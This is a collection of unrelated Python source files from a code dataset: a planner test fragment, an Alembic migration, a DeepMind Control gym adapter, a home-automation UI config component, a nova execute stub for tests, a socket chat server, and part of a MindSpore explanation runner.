b---c
\ x
a
'''
nodes = set('abcd')
start = 'a'
goal = 'b'
def neighbor_fn(env, node):
if node == 'a':
return 'b', 'c'
elif node == 'b':
return 'c', 'd'
elif node == 'c':
return 'b', 'd'
elif node == 'd':
return ()
def check_fn(env, s, d):
if s == 'a' and d == 'b':
return 0., ['ab.1', 'ab.2']
elif s == 'a' and d == 'c':
return float('inf'), []
elif s == 'b' and d == 'd':
return float('inf'), []
elif s == 'b' and d == 'c':
return 0., ['bc.1', 'bc.2']
elif s == 'c' and d == 'b':
return 0., ['cb.1', 'cb.2']
elif s == 'c' and d == 'd':
return 0., ['cd.1', 'cd.2']
plan(None, 'a', 'b', neighbor_fn, check_fn)
if __name__ == '__main__':
test_plan()
|
the-stack_106_22082
|
"""empty message
Revision ID: ee2b22119072
Revises:
Create Date: 2018-04-16 21:19:27.273617
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'ee2b22119072'
down_revision = None
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('user',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('access_token', sa.String(length=128), nullable=True),
sa.Column('first_name', sa.String(), nullable=True),
sa.PrimaryKeyConstraint('id')
)
op.create_table('rule',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('lat', sa.Float(), nullable=True),
sa.Column('lng', sa.Float(), nullable=True),
sa.Column('address', sa.String(), nullable=True),
sa.Column('time', sa.DateTime(), nullable=True),
sa.Column('append_date', sa.Boolean(), nullable=True),
sa.Column('activity_name', sa.String(), nullable=True),
sa.Column('user_id', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),
sa.PrimaryKeyConstraint('id')
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table('rule')
op.drop_table('user')
# ### end Alembic commands ###
|
the-stack_106_22083
|
"""Implements an adapter for DeepMind Control Suite environments."""
from collections import OrderedDict
import copy
import numpy as np
from dm_control import suite
from dm_control.rl.specs import ArraySpec, BoundedArraySpec
from dm_control.suite.wrappers import pixels
from gym import spaces
from .softlearning_env import SoftlearningEnv
DM_CONTROL_ENVIRONMENTS = {}
def convert_dm_control_to_gym_space(dm_control_space):
"""Recursively convert dm_control_space into gym space.
Note: Need to check the following cases of the input type, in the following
order:
(1) BoundedArraySpec
(2) ArraySpec
(3) OrderedDict.
- Generally, dm_control observation_specs are OrderedDict with other spaces
(e.g. ArraySpec) nested in it.
- Generally, dm_control action_specs are of type `BoundedArraySpec`.
To handle dm_control observation_specs as inputs, we check the following
input types in order to enable recursive calling on each nested item.
"""
if isinstance(dm_control_space, BoundedArraySpec):
gym_box = spaces.Box(
low=dm_control_space.minimum,
high=dm_control_space.maximum,
shape=None,
dtype=dm_control_space.dtype)
# Note: `gym.Box` doesn't allow both shape and min/max to be defined
# at the same time. Thus we omit shape in the constructor and verify
# that it's been implicitly set correctly.
assert gym_box.shape == dm_control_space.shape, (
(gym_box.shape, dm_control_space.shape))
return gym_box
elif isinstance(dm_control_space, ArraySpec):
if isinstance(dm_control_space, BoundedArraySpec):
raise ValueError("The order of the if-statements matters.")
return spaces.Box(
low=-float("inf"),
high=float("inf"),
shape=dm_control_space.shape,
dtype=dm_control_space.dtype)
elif isinstance(dm_control_space, OrderedDict):
return spaces.Dict(OrderedDict([
(key, convert_dm_control_to_gym_space(value))
for key, value in dm_control_space.items()
]))
else:
raise ValueError(dm_control_space)
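# Illustrative sketch (added; not part of the original module): how a nested
# dm_control-style observation spec maps onto gym spaces. The spec values below
# are made up for demonstration.
def _example_spec_conversion():
    observation_spec = OrderedDict([
        ('position', ArraySpec(shape=(3,), dtype=np.float64)),
        ('velocity', ArraySpec(shape=(3,), dtype=np.float64)),
    ])
    gym_space = convert_dm_control_to_gym_space(observation_spec)
    assert isinstance(gym_space, spaces.Dict)
    assert gym_space.spaces['position'].shape == (3,)
    return gym_space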
class DmControlAdapter(SoftlearningEnv):
"""Adapter between SoftlearningEnv and DeepMind Control Suite."""
def __init__(self,
domain,
task,
*args,
env=None,
normalize=True,
observation_keys=(),
goal_keys=(),
unwrap_time_limit=True,
pixel_wrapper_kwargs=None,
**kwargs):
assert not args, (
"Gym environments don't support args. Use kwargs instead.")
self.normalize = normalize
self.unwrap_time_limit = unwrap_time_limit
super(DmControlAdapter, self).__init__(
domain, task, *args, goal_keys=goal_keys, **kwargs)
if env is None:
assert (domain is not None and task is not None), (domain, task)
env = suite.load(
domain_name=domain,
task_name=task,
task_kwargs=kwargs
# TODO: Figure out how to pass kwargs to this guy.
# Need to split into `task_kwargs`, `environment_kwargs`, and
# `visualize_reward` bool. Check the suite.load(.) in:
# https://github.com/deepmind/dm_control/blob/master/dm_control/suite/__init__.py
)
self._env_kwargs = kwargs
else:
assert not kwargs
assert domain is None and task is None, (domain, task)
# Ensure action space is already normalized.
if normalize:
np.testing.assert_equal(env.action_spec().minimum, -1)
np.testing.assert_equal(env.action_spec().maximum, 1)
if pixel_wrapper_kwargs is not None:
env = pixels.Wrapper(env, **pixel_wrapper_kwargs)
self._env = env
assert isinstance(env.observation_spec(), OrderedDict)
self.observation_keys = (
observation_keys or tuple(env.observation_spec().keys()))
observation_space = convert_dm_control_to_gym_space(
env.observation_spec())
self._observation_space = type(observation_space)([
(name, copy.deepcopy(space))
for name, space in observation_space.spaces.items()
if name in self.observation_keys + self.goal_keys
])
action_space = convert_dm_control_to_gym_space(self._env.action_spec())
if len(action_space.shape) > 1:
raise NotImplementedError(
"Shape of the action space ({}) is not flat, make sure to"
" check the implemenation.".format(action_space))
self._action_space = action_space
def step(self, action, *args, **kwargs):
time_step = self._env.step(action, *args, **kwargs)
reward = time_step.reward
terminal = time_step.last()
info = {
key: value
for key, value in time_step.observation.items()
if key not in self.observation_keys
}
observation = self._filter_observation(time_step.observation)
        # namedtuple._replace returns a new tuple; keep the filtered observation.
        time_step = time_step._replace(observation=observation)
return observation, reward, terminal, info
def reset(self, *args, **kwargs):
time_step = self._env.reset(*args, **kwargs)
observation = self._filter_observation(time_step.observation)
        time_step = time_step._replace(observation=observation)
        return time_step.observation
def render(self, *args, mode="human", camera_id=0, **kwargs):
if mode == "human":
raise NotImplementedError(
"TODO: Figure out how to not continuously launch"
" viewers if one is already open."
" See: https://github.com/deepmind/dm_control/issues/39.")
elif mode == "rgb_array":
return self._env.physics.render(
*args, camera_id=camera_id, **kwargs)
raise NotImplementedError(mode)
def seed(self, *args, **kwargs):
return self._env.seed(*args, **kwargs)
@property
def unwrapped(self):
return self._env
|
the-stack_106_22084
|
"""Support for the Devcon UI."""
from functools import wraps
import logging
import os
import time
import voluptuous as vol
from openpeerpower.components import websocket_api
from openpeerpower.exceptions import OpenPeerPowerError
from openpeerpower.util.yaml import load_yaml
_LOGGER = logging.getLogger(__name__)
DOMAIN = "devcon"
STORAGE_KEY = DOMAIN
STORAGE_VERSION = 1
CONF_MODE = "mode"
MODE_YAML = "yaml"
MODE_STORAGE = "storage"
CONFIG_SCHEMA = vol.Schema(
{
DOMAIN: vol.Schema(
{
vol.Optional(CONF_MODE, default=MODE_STORAGE): vol.All(
vol.Lower, vol.In([MODE_YAML, MODE_STORAGE])
)
}
)
},
extra=vol.ALLOW_EXTRA,
)
EVENT_LOVELACE_UPDATED = "devcon_updated"
LOVELACE_CONFIG_FILE = "ui-devcon.yaml"
class ConfigNotFound(OpenPeerPowerError):
"""When no config available."""
async def async_setup(opp, config):
"""Set up the Devcon commands."""
# Pass in default to `get` because defaults not set if loaded as dep
mode = config.get(DOMAIN, {}).get(CONF_MODE, MODE_STORAGE)
opp.components.frontend.async_register_built_in_panel(DOMAIN, config={"mode": mode})
if mode == MODE_YAML:
opp.data[DOMAIN] = DevconYAML(opp)
else:
opp.data[DOMAIN] = DevconStorage(opp)
opp.components.websocket_api.async_register_command(websocket_devcon_config)
opp.components.websocket_api.async_register_command(websocket_devcon_save_config)
opp.components.websocket_api.async_register_command(websocket_devcon_delete_config)
opp.components.system_health.async_register_info(DOMAIN, system_health_info)
return True
class DevconStorage:
"""Class to handle Storage based Devcon config."""
def __init__(self, opp):
"""Initialize Devcon config based on storage helper."""
self._store = opp.helpers.storage.Store(STORAGE_VERSION, STORAGE_KEY)
self._data = None
self._opp = opp
async def async_get_info(self):
"""Return the YAML storage mode."""
if self._data is None:
await self._load()
if self._data["config"] is None:
return {"mode": "auto-gen"}
return _config_info("storage", self._data["config"])
async def async_load(self, force):
"""Load config."""
if self._opp.config.safe_mode:
raise ConfigNotFound
if self._data is None:
await self._load()
config = self._data["config"]
if config is None:
raise ConfigNotFound
return config
async def async_save(self, config):
"""Save config."""
if self._data is None:
await self._load()
self._data["config"] = config
self._opp.bus.async_fire(EVENT_LOVELACE_UPDATED)
await self._store.async_save(self._data)
async def async_delete(self):
"""Delete config."""
await self.async_save(None)
async def _load(self):
"""Load the config."""
data = await self._store.async_load()
self._data = data if data else {"config": None}
class DevconYAML:
"""Class to handle YAML-based Devcon config."""
def __init__(self, opp):
"""Initialize the YAML config."""
self.opp = opp
self._cache = None
async def async_get_info(self):
"""Return the YAML storage mode."""
try:
config = await self.async_load(False)
except ConfigNotFound:
return {
"mode": "yaml",
"error": "{} not found".format(
self.opp.config.path(LOVELACE_CONFIG_FILE)
),
}
return _config_info("yaml", config)
async def async_load(self, force):
"""Load config."""
is_updated, config = await self.opp.async_add_executor_job(
self._load_config, force
)
if is_updated:
self.opp.bus.async_fire(EVENT_LOVELACE_UPDATED)
return config
def _load_config(self, force):
"""Load the actual config."""
fname = self.opp.config.path(LOVELACE_CONFIG_FILE)
# Check for a cached version of the config
if not force and self._cache is not None:
config, last_update = self._cache
modtime = os.path.getmtime(fname)
if config and last_update > modtime:
return False, config
is_updated = self._cache is not None
try:
config = load_yaml(fname)
except FileNotFoundError:
raise ConfigNotFound from None
self._cache = (config, time.time())
return is_updated, config
async def async_save(self, config):
"""Save config."""
raise OpenPeerPowerError("Not supported")
async def async_delete(self):
"""Delete config."""
raise OpenPeerPowerError("Not supported")
def handle_yaml_errors(func):
"""Handle error with WebSocket calls."""
@wraps(func)
async def send_with_error_handling(opp, connection, msg):
error = None
try:
result = await func(opp, connection, msg)
except ConfigNotFound:
error = "config_not_found", "No config found."
except OpenPeerPowerError as err:
error = "error", str(err)
if error is not None:
connection.send_error(msg["id"], *error)
return
if msg is not None:
await connection.send_big_result(msg["id"], result)
else:
connection.send_result(msg["id"], result)
return send_with_error_handling
@websocket_api.async_response
@websocket_api.websocket_command(
{"type": "devcon/config", vol.Optional("force", default=False): bool}
)
@handle_yaml_errors
async def websocket_devcon_config(opp, connection, msg):
"""Send Devcon UI config over WebSocket configuration."""
return await opp.data[DOMAIN].async_load(msg["force"])
@websocket_api.async_response
@websocket_api.websocket_command(
{"type": "devcon/config/save", "config": vol.Any(str, dict)}
)
@handle_yaml_errors
async def websocket_devcon_save_config(opp, connection, msg):
"""Save Devcon UI configuration."""
await opp.data[DOMAIN].async_save(msg["config"])
@websocket_api.async_response
@websocket_api.websocket_command({"type": "devcon/config/delete"})
@handle_yaml_errors
async def websocket_devcon_delete_config(opp, connection, msg):
"""Delete Devcon UI configuration."""
await opp.data[DOMAIN].async_delete()
async def system_health_info(opp):
"""Get info for the info page."""
return await opp.data[DOMAIN].async_get_info()
def _config_info(mode, config):
"""Generate info about the config."""
return {
"mode": mode,
"resources": len(config.get("resources", [])),
"views": len(config.get("views", [])),
}
|
the-stack_106_22085
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (c) 2011 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""This modules stubs out functions in openstack.common.processutils."""
import re
from eventlet import greenthread
from nova.openstack.common import log as logging
from nova.openstack.common import processutils
LOG = logging.getLogger(__name__)
_fake_execute_repliers = []
_fake_execute_log = []
def fake_execute_get_log():
return _fake_execute_log
def fake_execute_clear_log():
global _fake_execute_log
_fake_execute_log = []
def fake_execute_set_repliers(repliers):
"""Allows the client to configure replies to commands."""
global _fake_execute_repliers
_fake_execute_repliers = repliers
def fake_execute_default_reply_handler(*ignore_args, **ignore_kwargs):
"""A reply handler for commands that haven't been added to the reply list.
Returns empty strings for stdout and stderr.
"""
return '', ''
def fake_execute(*cmd_parts, **kwargs):
"""This function stubs out execute.
    It optionally executes a preconfigured function to return expected data.
"""
global _fake_execute_repliers
process_input = kwargs.get('process_input', None)
check_exit_code = kwargs.get('check_exit_code', 0)
delay_on_retry = kwargs.get('delay_on_retry', True)
attempts = kwargs.get('attempts', 1)
run_as_root = kwargs.get('run_as_root', False)
cmd_str = ' '.join(str(part) for part in cmd_parts)
LOG.debug(_("Faking execution of cmd (subprocess): %s"), cmd_str)
_fake_execute_log.append(cmd_str)
reply_handler = fake_execute_default_reply_handler
for fake_replier in _fake_execute_repliers:
if re.match(fake_replier[0], cmd_str):
reply_handler = fake_replier[1]
LOG.debug(_('Faked command matched %s') % fake_replier[0])
break
if isinstance(reply_handler, basestring):
# If the reply handler is a string, return it as stdout
reply = reply_handler, ''
else:
try:
# Alternative is a function, so call it
reply = reply_handler(cmd_parts,
process_input=process_input,
delay_on_retry=delay_on_retry,
attempts=attempts,
run_as_root=run_as_root,
check_exit_code=check_exit_code)
except processutils.ProcessExecutionError as e:
LOG.debug(_('Faked command raised an exception %s'), e)
raise
stdout = reply[0]
stderr = reply[1]
LOG.debug(_("Reply to faked command is stdout='%(stdout)s' "
"stderr='%(stderr)s'") % locals())
# Replicate the sleep call in the real function
greenthread.sleep(0)
return reply
def stub_out_processutils_execute(stubs):
fake_execute_set_repliers([])
fake_execute_clear_log()
stubs.Set(processutils, 'execute', fake_execute)
|
the-stack_106_22087
|
import socket
import pickle
import threading
import sys
import argparse
import os
from datetime import datetime
from message import Message, EnhancedJSONEncoder
from streaming import createMsg, streamData
import json
from Crypto.Cipher import PKCS1_OAEP # RSA based cipher using Optimal Asymmetric Encryption Padding
from Crypto.PublicKey import RSA # to generate the keys
class RSAEncryption:
def __init__(self, bits):
self.BITS = bits
def generatePrivateKey(self):
self.private_key = RSA.generate(self.BITS)
def generatePublicKey(self):
self.public_key = self.private_key.publickey()
def writeToFile(self):
private_pem = self.private_key.exportKey().decode("utf-8")
public_pem = self.public_key.exportKey().decode("utf-8")
with open('./keys/private.pem', 'w+') as private:
private.write(private_pem)
        with open('./keys/public.pem', 'w+') as public:
            public.write(public_pem)
def importKeys(self):
keys = []
        pr_key = RSA.importKey(open('./keys/private.pem', 'r').read())
pu_key = RSA.importKey(open('./keys/public.pem', 'r').read())
keys.append(pr_key)
keys.append(pu_key)
return keys
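# Hypothetical usage sketch for RSAEncryption (the server's own encryption
# hooks below are currently commented out):
# enc = RSAEncryption(1024)
# enc.generatePrivateKey()
# enc.generatePublicKey()
# enc.writeToFile()
# private_key, public_key = enc.importKeys()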
class Server:
def __init__(self, ip, port, buffer_size):
self.IP = ip
self.PORT = port
self.BUFFER_SIZE = buffer_size
self.USERNAME = "server"
self.temp_f = False
self.connections = []
self.database = {
"host" : "username"
}
self.command_list = {
"[export_chat]" : "export current chat",
"[help]" : "display possibile commands"
}
self.users_log = "./logs/users.txt"
self.chat_log = "./logs/chatlog.txt"
self.cons_log = "./logs/cons.txt"
self.current_chat = "./logs/currentchat.txt"
self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# # encryption
# self.enc = RSAEncryption(1024)
# self.enc.generatePrivateKey()
# self.enc.generatePublicKey()
# self.enc.writeToFile()
# self.keys = self.enc.importKeys()
# self.cipher = PKCS1_OAEP.new(key = self.keys[0])
def startServer(self):
try:
self.server.bind((self.IP, self.PORT))
except socket.error as e:
print(str(e))
self.server.listen(10)
'''
#Load in previously created usernames
try:
usersFile = open("./logs/users.txt", "r")
except IOError as e:
print(str(e))
users = usersFile.readlines()
#loop through file, and no including empty lines, strip the line break escape char and add username to database
for user in users[1:]:
if(user != "\n"):
self.database.update({"offline": user.replace("\n", "")})
#just print out the usernames line by line
print(f"pre-existing users: ")
for account in self.database.values():
if(account != "username"):
print(account)
'''
print(f"[*] Starting server ({self.IP}) on port {self.PORT}")
def acceptConnections(self):
while True:
client_socket, address = self.server.accept()
print(f"[*] Connection from {address} has been established!")
self.logConnections(address[0])
cThread = threading.Thread(target = self.handler, args = (client_socket, address))
cThread.daemon = True
cThread.start()
self.connections.append(client_socket)
# self.sharePubKey(client_socket)
# def sharePubKey(self, client_socket):
# with open("./keys/public.pem", 'rb') as f:
# key = createMsg(pickle.dumps(f.read()))
# client_socket.send(key)
# print("*** Public Key sent ***")
def logConnections(self, address):
contime = datetime.now()
with open(self.cons_log, "a") as cons:
cons.write(address + ">" + str(contime) + '\n')
def logUsers(self, data):
with open(self.users_log, "a", encoding = "utf-8") as users:
users.write(data + '\n')
def logChat(self, data):
timestamp = datetime.now()
with open(self.chat_log, "a", encoding = "utf-8") as chatlog:
chatlog.write(data + " " + str(timestamp) + '\n')
def current(self, data):
""" wasn't sure about using with here """
self.currentchat = open(self.current_chat, "a+", encoding = "utf-8")
self.currentchat.write(data + '\n')
def checkUsername(self, client_socket, address, data):
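        # Reject the chosen username if it is already present in self.database;
        # otherwise register it for this address, log it, and confirm the join.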
flag = False
decoded_content = data["cont"]
# decrypted_data = self.cipher.decrypt(data).decode("utf-8")
for user in self.database:
if self.database[user] == decoded_content:
flag = True
self.temp_f = True
content = "[*] Username already in use!"
# encrypted_content = self.cipher.encrypt(content)
warning = Message(self.IP, address, self.USERNAME, str(datetime.now()), content, 'username_taken')
client_socket.send(warning.pack().encode("utf-8"))
break
if flag == False:
self.database.update( {address : decoded_content} )
self.logUsers(decoded_content)
content = "[*] You have joined the chat!"
# encrypted_content = self.cipher.encrypt(content)
joined = Message(self.IP, address, self.USERNAME, str(datetime.now()), content, 'approved_conn')
client_socket.send(joined.pack().encode("utf-8"))
def exportChat(self, client_socket, address):
with open(self.current_chat, "rb") as chat:
content = chat.read()
packet = Message(self.IP, address, self.USERNAME, str(datetime.now()), content, 'export')
for connection in self.connections:
if connection == client_socket:
connection.send(packet.pack())
print("[*] Sent!")
def commandList(self, client_socket):
cdict = createMsg(pickle.dumps(self.command_list)) # manually crafting since i can't call pack() -> not a message obj
for connection in self.connections:
if connection == client_socket:
connection.send(cdict)
print("[*] Sent!")
def closeConnection(self, client_socket, address):
disconnected_msg = f"[{address[0]}] has left the chat"
        left_msg_obj = Message(self.IP, "allhosts", self.USERNAME, str(datetime.now()), disconnected_msg, 'default')
left_msg = left_msg_obj.pack()
self.connections.remove(client_socket)
for connection in self.connections:
connection.send(left_msg.encode("utf-8"))
if not self.connections:
try:
os.remove(self.current_chat)
except FileNotFoundError:
print("*** Nothing to clear in the logs")
try:
del self.database[address]
except KeyError:
pass
client_socket.close()
def handler(self, client_socket, address):
while True:
try:
data = streamData(client_socket)
except ConnectionResetError:
print(f"*** [{address[0]}] unexpectedly closed the connetion, received only an RST packet.")
self.closeConnection(client_socket, address)
break
if not data:
print(f"*** [{address[0]}] disconnected")
self.closeConnection(client_socket, address)
break
if data["typ"] == 'setuser':
self.checkUsername(client_socket, address, data)
if self.temp_f == True:
continue
else:
if data["cont"] != '':
if data["typ"] == 'default':
self.logChat(data["cont"])
self.current(data["cont"])
else:
self.logChat(data["cont"])
if data["typ"] == 'export':
print("*** Sending chat...")
self.exportChat(client_socket, address)
elif data["typ"] == 'help':
print("*** Sending command list...")
self.commandList(client_socket)
else:
for connection in self.connections:
if connection != client_socket:
connection.send(createMsg(json.dumps(data)).encode("utf-8"))
def getArgs():
parser = argparse.ArgumentParser()
parser.add_argument("-p", "--port", dest = "port", help = "Start server on port X")
options = parser.parse_args()
if not options.port:
raise Exception
else:
return options
def main():
try:
options = getArgs()
PORT = int(options.port)
except Exception: # if the user doesn't parse values from the command line
PORT = int(input("*** Start server on port > "))
HOSTNAME = socket.gethostname()
IP = socket.gethostbyname(HOSTNAME)
BUFFER_SIZE = 1024
server = Server(IP, PORT, BUFFER_SIZE)
try:
server.startServer()
server.acceptConnections()
except Exception as e:
print("General error", str(e))
if __name__ == "__main__":
main()
|
the-stack_106_22089
|
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Runner."""
from time import time
from typing import Tuple, List, Optional
import numpy as np
from mindspore.train.summary_pb2 import Explain
import mindspore as ms
import mindspore.dataset as ds
from mindspore import log
from mindspore.ops.operations import ExpandDims
from mindspore.train.summary._summary_adapter import _convert_image_format, _make_image
from mindspore.train.summary.summary_record import SummaryRecord
from .benchmark import Localization
from .benchmark._attribution.metric import AttributionMetric
from .explanation._attribution._attribution import Attribution
_EXPAND_DIMS = ExpandDims()
_CMAP_0 = np.reshape(np.array([55, 25, 86, 255]), [1, 1, 4]) / 255
_CMAP_1 = np.reshape(np.array([255, 255, 0, 255]), [1, 1, 4]) / 255
def _normalize(img_np):
"""Normalize the image in the numpy array to be in [0, 255]. """
max_ = img_np.max()
min_ = img_np.min()
normed = (img_np - min_) / (max_ - min_).clip(min=1e-10)
return (normed * 255).astype(np.uint8)
def _make_rgba(saliency):
"""Make rgba image for saliency map."""
saliency = saliency.asnumpy().squeeze()
saliency = (saliency - saliency.min()) / (saliency.max() - saliency.min()).clip(1e-10)
rgba = np.empty((saliency.shape[0], saliency.shape[1], 4))
rgba[:, :, :] = np.expand_dims(saliency, 2)
rgba = rgba * _CMAP_1 + (1 - rgba) * _CMAP_0
rgba[:, :, -1] = saliency * 1
return rgba
class ExplainRunner:
"""
High-level API for users to generate results with the explanation methods and the evaluation methods.
After generating results with the explanation methods and the evaluation methods, the results will be written into
a specified file with 'mindspore.summary.SummaryRecord'. The stored content can be viewed using MindInsight.
Args:
summary_dir (str): The directory path to save the summary files which store the generated results.
Default: "./"
Examples:
>>> # init a runner with a specified directory
>>> summary_dir = "summary_dir"
>>> runner = ExplainRunner(summary_dir)
"""
def __init__(self, summary_dir: Optional[str] = "./"):
self._summary_dir = summary_dir
self._count = 0
self._classes = None
self._model = None
def run(self,
dataset: Tuple,
explainers: List,
benchmarkers: Optional[List] = None):
"""
        Generate results and write results into the summary files in `self.summary_dir`.
Args:
dataset (tuple): A tuple that contains `mindspore.dataset` object for iteration and its labels.
- dataset[0], a `mindspore.dataset` object to provide data to explain.
- dataset[1], a list of string that specifies the label names of the dataset.
explainers (list): A list of explanation objects to generate _attribution results.
benchmarkers (list): A list of benchmark objects to generate evaluation results. Default: None
Examples:
>>> from mindspore.explainer.explanation import GuidedBackprop, Gradient
>>> # obtain dataset object
>>> dataset = get_dataset()
>>> classes = ["cat", "dog", ...]
>>> # load checkpoint to a network, e.g. resnet50
>>> param_dict = load_checkpoint("checkpoint.ckpt")
>>> net = resnet50(len(classes))
            >>> load_param_into_net(net, param_dict)
>>> # bind net with its output activation
>>> model = nn.SequentialCell([net, nn.Sigmoid()])
>>> gbp = GuidedBackprop(model)
>>> gradient = Gradient(model)
>>> runner = ExplainRunner("./")
>>> explainers = [gbp, gradient]
>>> runner.run((dataset, classes), explainers)
"""
if not isinstance(dataset, tuple):
raise TypeError("Argument `dataset` must be a tuple.")
if len(dataset) != 2:
raise ValueError("Argument `dataset` should be a tuple with length = 2.")
dataset, classes = dataset
self._verify_data_form(dataset, benchmarkers)
self._classes = classes
if explainers is None or not explainers:
raise ValueError("Argument `explainers` can neither be None nor empty.")
for exp in explainers:
if not isinstance(exp, Attribution) or not isinstance(explainers, list):
raise TypeError("Argument explainers should be a list of objects of classes in "
"`mindspore.explainer.explanation._attribution`.")
if benchmarkers is not None:
for bench in benchmarkers:
if not isinstance(bench, AttributionMetric) or not isinstance(explainers, list):
raise TypeError("Argument benchmarkers should be a list of objects of classes in explanation"
"`mindspore.explainer.benchmark._attribution`.")
self._model = explainers[0].model
with SummaryRecord(self._summary_dir) as summary:
print("Start running and writing......")
begin = time()
print("Start writing metadata.")
explain = Explain()
explain.metadata.label.extend(classes)
exp_names = [exp.__class__.__name__ for exp in explainers]
explain.metadata.explain_method.extend(exp_names)
if benchmarkers is not None:
bench_names = [bench.__class__.__name__ for bench in benchmarkers]
explain.metadata.benchmark_method.extend(bench_names)
summary.add_value("explainer", "metadata", explain)
summary.record(1)
print("Finish writing metadata.")
now = time()
print("Start running and writing inference data......")
imageid_labels = self._run_inference(dataset, summary)
print("Finish running and writing inference data. Time elapsed: {}s".format(time() - now))
if benchmarkers is None:
for exp in explainers:
start = time()
print("Start running and writing explanation data for {}......".format(exp.__class__.__name__))
self._count = 0
ds.config.set_seed(58)
for idx, next_element in enumerate(dataset):
now = time()
self._run_exp_step(next_element, exp, imageid_labels, summary)
print("Finish writing {}-th explanation data. Time elapsed: {}".format(
idx, time() - now))
print("Finish running and writing explanation data for {}. Time elapsed: {}".format(
exp.__class__.__name__, time() - start))
else:
for exp in explainers:
explain = Explain()
for bench in benchmarkers:
bench.reset()
print(f"Start running and writing explanation and benchmark data for {exp.__class__.__name__}.")
self._count = 0
start = time()
ds.config.set_seed(58)
for idx, next_element in enumerate(dataset):
now = time()
saliency_dict_lst = self._run_exp_step(next_element, exp, imageid_labels, summary)
print("Finish writing {}-th batch explanation data. Time elapsed: {}s".format(
idx, time() - now))
for bench in benchmarkers:
now = time()
self._run_exp_benchmark_step(next_element, exp, bench, saliency_dict_lst)
print("Finish running {}-th batch benchmark data for {}. Time elapsed: {}s".format(
idx, bench.__class__.__name__, time() - now))
for bench in benchmarkers:
benchmark = explain.benchmark.add()
benchmark.explain_method = exp.__class__.__name__
benchmark.benchmark_method = bench.__class__.__name__
benchmark.total_score = bench.performance
benchmark.label_score.extend(bench.class_performances)
print("Finish running and writing explanation and benchmark data for {}. "
"Time elapsed: {}s".format(exp.__class__.__name__, time() - start))
summary.add_value('explainer', 'benchmark', explain)
summary.record(1)
print("Finish running and writing. Total time elapsed: {}s".format(time() - begin))
@staticmethod
def _verify_data_form(dataset, benchmarkers):
"""
Verify the validity of dataset.
Args:
dataset (`ds`): the user parsed dataset.
benchmarkers (list[`AttributionMetric`]): the user parsed benchmarkers.
"""
next_element = dataset.create_tuple_iterator().get_next()
if len(next_element) not in [1, 2, 3]:
raise ValueError("The dataset should provide [images] or [images, labels], [images, labels, bboxes]"
" as columns.")
if len(next_element) == 3:
inputs, labels, bboxes = next_element
if bboxes.shape[-1] != 4:
raise ValueError("The third element of dataset should be bounding boxes with shape of "
"[batch_size, num_ground_truth, 4].")
else:
if True in [isinstance(bench, Localization) for bench in benchmarkers]:
raise ValueError("The dataset must provide bboxes if Localization is to be computed.")
if len(next_element) == 2:
inputs, labels = next_element
if len(next_element) == 1:
inputs = next_element[0]
if len(inputs.shape) > 4 or len(inputs.shape) < 3 or inputs.shape[-3] not in [1, 3, 4]:
raise ValueError(
"Image shape {} is unrecognizable: the dimension of image can only be CHW or NCHW.".format(
inputs.shape))
if len(inputs.shape) == 3:
log.warning(
"Image shape {} is 3-dimensional. All the data will be automatically unsqueezed at the 0-th"
" dimension as batch data.".format(inputs.shape))
if len(next_element) > 1:
if len(labels.shape) > 2 and (np.array(labels.shape[1:]) > 1).sum() > 1:
raise ValueError(
"Labels shape {} is unrecognizable: labels should not have more than two dimensions"
" with length greater than 1.".format(labels.shape))
def _transform_data(self, inputs, labels, bboxes, ifbbox):
"""
Transform the data from one iteration of dataset to a unifying form for the follow-up operations.
Args:
inputs (Tensor): the image data
labels (Tensor): the labels
            bboxes (Tensor): the bounding boxes data
            ifbbox (bool): whether to preprocess bboxes. If True, a dictionary that indicates bounding boxes w.r.t. label
                id will be returned. If False, the returned bboxes are the parsed bboxes.
Returns:
inputs (Tensor): the image data, unified to a 4D Tensor.
labels (List[List[int]]): the ground truth labels.
bboxes (Union[List[Dict], None, Tensor]): the bounding boxes
"""
inputs = ms.Tensor(inputs, ms.float32)
if len(inputs.shape) == 3:
inputs = _EXPAND_DIMS(inputs, 0)
if isinstance(labels, ms.Tensor):
labels = ms.Tensor(labels, ms.int32)
labels = _EXPAND_DIMS(labels, 0)
if isinstance(bboxes, ms.Tensor):
bboxes = ms.Tensor(bboxes, ms.int32)
bboxes = _EXPAND_DIMS(bboxes, 0)
input_len = len(inputs)
if bboxes is not None and ifbbox:
bboxes = ms.Tensor(bboxes, ms.int32)
masks_lst = []
labels = labels.asnumpy().reshape([input_len, -1])
bboxes = bboxes.asnumpy().reshape([input_len, -1, 4])
for idx, label in enumerate(labels):
height, width = inputs[idx].shape[-2], inputs[idx].shape[-1]
masks = {}
for j, label_item in enumerate(label):
target = int(label_item)
if -1 < target < len(self._classes):
if target not in masks:
mask = np.zeros((1, 1, height, width))
else:
mask = masks[target]
x_min, y_min, x_len, y_len = bboxes[idx][j].astype(int)
mask[:, :, x_min:x_min + x_len, y_min:y_min + y_len] = 1
masks[target] = mask
masks_lst.append(masks)
bboxes = masks_lst
labels = ms.Tensor(labels, ms.int32)
if len(labels.shape) == 1:
labels_lst = [[int(i)] for i in labels.asnumpy()]
else:
labels = labels.asnumpy().reshape([input_len, -1])
labels_lst = []
for item in labels:
